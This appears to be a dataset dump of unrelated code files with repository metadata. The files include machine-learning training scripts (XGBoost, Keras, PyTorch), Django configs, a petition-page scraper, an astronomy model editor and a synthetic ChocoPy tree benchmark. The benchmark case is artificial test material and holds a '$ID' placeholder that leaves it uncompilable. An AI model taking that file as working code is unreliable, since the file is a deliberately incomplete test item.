X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2, random_state=1)#random_state=1 убирает рандом что он всегжа одинаков
# feature scaling
from sklearn.preprocessing import StandardScaler
ss=StandardScaler() #сколько среднеквадратичных отклонений содержит наша величина
X_train[:,3:]=ss.fit_transform(X_train[:,3:])#применяем к тестовой выборке
# когда мы вызываем fit_transform мы (1) готовим модель кторая конвертирует, а потом на основе ее изменяем наши данные
X_test[:,3:]=ss.transform(X_test[:,3:]) # тут только transform потому что мы ТОЛЬКО ЧТО создали модель странсформации, и среднее и отклонение УЖЕ расчитаны, поэтому только меняем
#Training XGBoost on the training set
from xgboost import XGBClassifier
classifier=XGBClassifier()
classifier.fit(X_train, y_train)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
y_pred = classifier.predict(X_test)
cm = confusion_matrix(y_test, y_pred)
print('--kernel SVM--')
print(cm)
print(accuracy_score(y_test, y_pred))
#applying k-fold cross validation
from sklearn.model_selection import cross_val_score
#прогонит все через N итераций и тестовая и тренееровочная выборка всегда будут разные, делаем мы это на тренировочной сессии
accuacies=cross_val_score(estimator=classifier,X=X_train,y=y_train,cv=10)
print("Accurace {:.2f} %".format(accuacies.mean()*100))
print("Standart Deviation {:.2f} %".format(accuacies.std()*100))
|
[
"tttaaabbb@gmail.com"
] |
tttaaabbb@gmail.com
|
dd1221db4a088cf90bcdefff2c489c4642863126
|
9c3934402046850104523e9d942d62e42175b512
|
/theblog/urls.py
|
e8d6cd26d99ae97986d6defb2b4be29934047079
|
[] |
no_license
|
Dekatron322/myblog
|
39954bf26ac7468dae2e888aba1a1855a0832835
|
4d4118eecb458dc53073cd8c3ff9eaa0235926c8
|
refs/heads/master
| 2022-06-18T07:01:57.218863
| 2020-05-08T08:35:57
| 2020-05-08T08:35:57
| 262,269,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
from django.urls import path, include
from .import views
urlpatterns = [
path('', views.index, name="index"),
path('blog/', views.blog, name="post-list"),
path('post/<id>/', views.post, name="post-detail"),
path('search/', views.search, name='search'),
path('tinymce/', include('tinymce.urls')),
path('post/<id>/update', views.post_update, name="post-update"),
path('post/<id>/delete', views.post_delete, name="post-delete"),
path('create/', views.post_create, name="post-create"),
]
|
[
"muritalaibrahim097@gmail.com"
] |
muritalaibrahim097@gmail.com
|
ba63a3a0d366b8dda91ff26b399b9d95d20616da
|
f4878f730033b8a4780bcca5c957232fdcbe132f
|
/backend/cron_service/apps.py
|
fd8595ddd05bac11e77707007ae0819e6224d33d
|
[] |
no_license
|
edwardsujono/information_retrieval
|
d29b007d19a8c687d314a65aa87442bc3c19239b
|
8b4a2ca7483c855e173eae43aac65d2b9dc0ee1d
|
refs/heads/master
| 2022-12-13T03:23:16.804343
| 2018-06-27T09:07:56
| 2018-06-27T09:07:56
| 120,317,716
| 0
| 0
| null | 2022-11-04T19:17:50
| 2018-02-05T14:45:22
|
Python
|
UTF-8
|
Python
| false
| false
| 98
|
py
|
from django.apps import AppConfig
class CronServiceConfig(AppConfig):
name = 'cron_service'
|
[
"edwardsujono81@gmail.com"
] |
edwardsujono81@gmail.com
|
d1f4fd1c4dac2532a9b867e1f6f280506af13056
|
4cc40da438b404be9f5fdaa35fddd8fb9fb3d46b
|
/branched-CNN.py
|
f276948126dd1984a779a042df787cb6630d7f4c
|
[] |
no_license
|
vlimant/summer16-NikolausHowe
|
266e993864342b13e0f12cf70a313a192e2488db
|
b58fe9b4ffa068dd6584d8ce5d9bada83c40f0b6
|
refs/heads/master
| 2021-01-17T10:18:01.519593
| 2016-06-14T18:10:06
| 2016-06-14T18:10:06
| 59,652,326
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,417
|
py
|
# coding: utf-8
# # Branched Convolutional NN
# Import io functions
import setGPU0
from io_functions import *
from draw_functions import *
# ## Prepare the data
train_data, test_data, train_labels, test_labels = train_test(shape=(1, 20, 20, 25), split=0.33)
# ## Create and train the model
model1 = Sequential()
model1.add(Convolution3D(3, 4, 4, 5, input_shape = (1, 20, 20, 25), activation='relu'))
model1.add(MaxPooling3D())
model1.add(Flatten())
model2 = Sequential()
model2.add(Convolution3D(3, 3, 3, 4, input_shape = (1, 20, 20, 25), activation='relu'))
model2.add(MaxPooling3D())
model2.add(Flatten())
model3 = Sequential()
model3.add(Convolution3D(3, 5, 5, 6, input_shape = (1, 20, 20, 25), activation='relu'))
model3.add(MaxPooling3D())
model3.add(Flatten())
## join the two
bmodel = Sequential()
bmodel.add(Merge([model1,model2,model3], mode='concat'))
## fully connected ending
bmodel.add(Dense(1000, activation='relu'))
bmodel.add(Dropout(0.5))
bmodel.add(Dense(1, init='uniform', activation='sigmoid'))
bmodel.compile(loss='binary_crossentropy', optimizer='sgd')
bmodel.summary()
# Fit the model
fit_history = bmodel.fit([train_data, train_data, train_data], train_labels, nb_epoch=100, batch_size=1000, verbose=1)
# Get and save predictions
predictions = bmodel.predict([test_data, test_data, test_data])
store_model(bmodel, fit_history.history['loss'], 'bcnn', (predictions, test_labels))
|
[
"root@titans.hep.caltech.edu"
] |
root@titans.hep.caltech.edu
|
d28a215ec3464b1ddb53f92fdd49c009a6fe2f10
|
40cfe070ef7e11b98ca89b2507fb74180bc31970
|
/train.py
|
923c4c200cf5a9d8145ce491a8341ba55fce16f0
|
[] |
no_license
|
Cx-x-x-x/4Models
|
7b609d1d21cf4e971c91c18a02fdbce717b4d775
|
fd200b37bcf73fbad0ef033d6b9a99d341e60cd2
|
refs/heads/master
| 2022-10-08T23:42:01.805481
| 2020-06-12T09:20:30
| 2020-06-12T09:20:30
| 271,168,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,205
|
py
|
import os
import argparse
import time
from tensorboardX import SummaryWriter
import torch
from torch import nn
import torchvision
from torch import optim
from torchvision import transforms
from torchvision.datasets import ImageFolder
from torch.utils.data import DataLoader
from config import device, save_dir, MODEL, pthfile, Epoch, BatchSize, Optimizer, lr, wd, SaveFreq, tensorboard_dir
from filter_weight_decay import group_weight
writer = SummaryWriter('/Disk1/chenxin/runs/' + tensorboard_dir)
start = time.time()
# 参数设置,使得我们能够手动输入命令行参数,就是让风格变得和Linux命令行差不多
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--outf', default='/Disk1/chenxin/model/' + save_dir,
help='folder to output images and model checkpoints')
args = parser.parse_args()
"""data"""
train_transform = transforms.Compose([transforms.Resize((299, 299)),
transforms.ColorJitter(brightness=0.05, contrast=0.05, saturation=0.05),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.RandomRotation(45),
transforms.ToTensor(),
transforms.Normalize([0.72033167, 0.4602297, 0.38352215], [0.22272113, 0.19686753, 0.19163243]),
])
test_transform = transforms.Compose([transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.72033167, 0.4602297, 0.38352215], [0.22272113, 0.19686753, 0.19163243])])
train_dataset = ImageFolder('/Disk1/chenxin/LSID3_5_1/train0', transform=train_transform)
train_loader = DataLoader(dataset=train_dataset, batch_size=BatchSize,
shuffle=True, num_workers=40)
test_dataset = ImageFolder('/Disk1/chenxin/LSID3_5_1/test0', transform=test_transform)
test_loader = DataLoader(dataset=test_dataset, batch_size=BatchSize,
shuffle=False, num_workers=40)
""" model"""
model = MODEL
# load pth
model_dict = model.state_dict()
pretrained_dict = torch.load(pthfile)
pretrained_dict = {k: v for k, v in pretrained_dict.items() if 'fc' not in k}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict, strict=True)
# Loss and Optimizer
parameters = group_weight(model)
criterion = nn.CrossEntropyLoss()
if Optimizer == 'adam':
optimizer = optim.Adam(parameters, lr=lr, weight_decay=wd)
if Optimizer == 'sgd':
optimizer = optim.SGD(parameters, lr=lr, weight_decay=wd)
# learning rate decay
# lambda1 = lambda epoch: .1 if epoch > 39 else 1 # 10epoch后*0.1
# scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda1)
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
# train
if __name__ == "__main__":
if not os.path.exists(args.outf):
os.makedirs(args.outf)
best_acc = 85 # 2 初始化best test accuracy
print("Start Training !") # 定义遍历数据集的次数
with open("test_acc_loss.txt", "w") as f, open("train_acc_loss.txt", "w") as f1, open("log.txt", "w")as f2:
for epoch in range(Epoch):
print('\nEpoch: %d' % (epoch + 1))
model.train()
sum_loss = 0.0
correct = 0.0
total = 0.0
for i, data in enumerate(train_loader, 0):
# prepare data
length = len(train_loader)
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# forward + backward
outputs = model(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# scheduler.step() # todo
# 每训练1个batch打印一次loss和准确率
sum_loss += loss.item()
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += predicted.eq(labels.data).sum()
print('[epoch:%d, iter:%d] Loss: %.03f | Acc: %.3f%% '
% (epoch + 1, (i + 1 + epoch * length), sum_loss / (i + 1), 100. * correct / total))
f2.write('%03d %05d |Loss: %.03f | Acc: %.3f%% '
% (epoch + 1, (i + 1 + epoch * length), sum_loss / (i + 1), 100. * correct / total))
f2.write('\n')
f2.flush()
# 记录每一个epoch最后一个batch的训练准确率,为了与test的做对比
f1.write('%03d %.3f%% %.03f' % (epoch+1, 100. * correct / total, sum_loss / (i + 1)))
f1.write('\n')
f1.flush()
# loss
writer.add_scalar('train_acc', 100. * correct / total, global_step=epoch)
# histogram
for name, param in model.named_parameters():
writer.add_histogram(name, param.clone().cpu().data.numpy(), epoch)
# 每训练完一个epoch测试一下准确率
print("Waiting Test!")
with torch.no_grad():
correct = 0
total = 0
test_loss = 0.0
for data in test_loader:
model.eval()
images, labels = data
images, labels = images.to(device), labels.to(device)
outputs = model(images)
loss = criterion(outputs, labels)
test_loss += loss.item()
# 取得分最高的那个类 (outputs.data的索引号)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
acc = 100. * correct / total
print('测试分类准确率为:%.3f%%' % (acc))
# 保存模型 10epoch
if (epoch + 1) % SaveFreq == 0:
print('Saving model......')
torch.save(model.state_dict(), '%s/net_%03d.pth' % (args.outf, epoch + 1))
# 每个epoch测试结果写入test_acc_loss.txt文件中
f.write("%03d %.3f%% %.03f" % (epoch + 1, acc, test_loss / len(test_loader)))
f.write('\n')
f.flush()
# 记录最佳测试分类准确率并写入best_acc.txt文件中
if acc > best_acc:
f3 = open("best_acc.txt", "w")
f3.write("EPOCH=%d,best_acc= %.3f%%" % (epoch + 1, acc))
f3.close()
best_acc = acc
print("Training Finished, TotalEPOCH=%d" % Epoch)
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
end = time.time()
print("final is in ", end-start)
|
[
"1004058940@qq.com"
] |
1004058940@qq.com
|
2e8d96e368d310b51d62e922dc251c8951687ea3
|
8a00b3895a626cf539a526b62c517deea06971d4
|
/stage.py
|
9d9b0332b17a9699b9cb20e7429128322ce4261e
|
[
"MIT"
] |
permissive
|
SJang1/korea-president-petition-crawler
|
f77083cdfaa7efc38b4e39966259c47f310613d9
|
a377b098562a2c22748c437fd320cc8f7aabcdcb
|
refs/heads/master
| 2020-04-22T13:23:50.183111
| 2019-02-13T00:45:48
| 2019-02-13T00:45:48
| 170,407,752
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
import requests
from bs4 import BeautifulSoup
import time
import os
codes = ["522031"]
def crawl(code):
url = "https://www1.president.go.kr/petitions/{}".format(code)
data = requests.get(url)
return data.content
def user(string):
httprequest = BeautifulSoup(string, "html.parser")
wrapuser = httprequest.find("h2", {"class":"petitionsView_count"})
users = wrapuser.find("span", {"class":"counter"})
title = httprequest.find("h3", {"class":"petitionsView_title"})
timestamp = time.ctime()
return {"time":timestamp,"title":title.text, "agrees":users.text}
def main():
for code in codes:
predata = user(crawl(code))
f = open("output.txt", "a")
f.write(os.linesep + str(predata))
f.close()
time.sleep(150)
main()
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
0578556910a5e7586de81a51629b513859639bf0
|
c56adc19280a64644db0610e123770b5a81f7cd0
|
/tools/tools_in_py/model_editor.py
|
32c5ddbb23b610f08e54150a9d9244d65d60616b
|
[] |
no_license
|
misabelber/LMC
|
060eeb57d2a546812a0e421596a88a741415eb79
|
df1d054842c0831e473298d9878df0ade8edefdb
|
refs/heads/master
| 2020-03-14T10:51:40.707716
| 2019-06-13T12:37:51
| 2019-06-13T12:37:51
| 131,577,794
| 1
| 3
| null | 2018-06-12T08:48:34
| 2018-04-30T09:30:32
|
C
|
UTF-8
|
Python
| false
| false
| 775
|
py
|
import gammalib
import math
import numpy as np
#Open model file
models = gammalib.GModels("../../models/LMC_model.xml")
centerRA = 80.0
centerDEC = -69.5
centerRA = math.radians(centerRA)
centerDEC = math.radians(centerDEC)
for model in models:
name = model.name()
tipo = model.type()
if tipo=="PointSource":
RA = model.spatial()["RA"].value()
dec = model.spatial()["DEC"].value()
RA = math.radians(RA)
dec = math.radians(dec)
DA = math.sin(dec)*math.sin(centerDEC)+math.cos(dec)*math.cos(centerDEC)*math.cos(RA-centerRA)
DA = math.degrees(math.acos(DA))
print DA
if DA > 6.:
for par in model:
par.fix()
models.save("../models/LMC_closer_files.xml")
|
[
"m.isabel.bernardos@gmail.com"
] |
m.isabel.bernardos@gmail.com
|
3d656918b0a1a22e90490255d65024864c89b8db
|
795e311122381d25101f459c4f6f95e3ffa32981
|
/day3/sz1.py
|
18c7a3be5c48ef0ad83c978b383e690db13a2d09
|
[] |
no_license
|
ljyxy1997/winter
|
7567df5eb55cf69b0cc17e898cb5bda0e7a5e578
|
c0f9228fc4c4ea91bacbb234d1351a8d1779b3a8
|
refs/heads/master
| 2023-04-13T21:32:49.337124
| 2021-04-27T12:17:06
| 2021-04-27T12:17:06
| 362,072,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
temp = input('猜测我设定的值')
num=int(temp)
while num!=8:
num=int(input('错了,再来一次'))
if num==8:
print('厉害')
else:
if num>8:
print('太大了')
else:
print('太小了')
print('结束')
|
[
"ljyxy1997@163.com"
] |
ljyxy1997@163.com
|
08631b60708e517e228451d1629faaf2e74402f4
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/tree-big-6757.py
|
b4b3b9f3005553b5202d6d4dff1c2e95e4d0376b
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,289
|
py
|
# Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:$ID = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
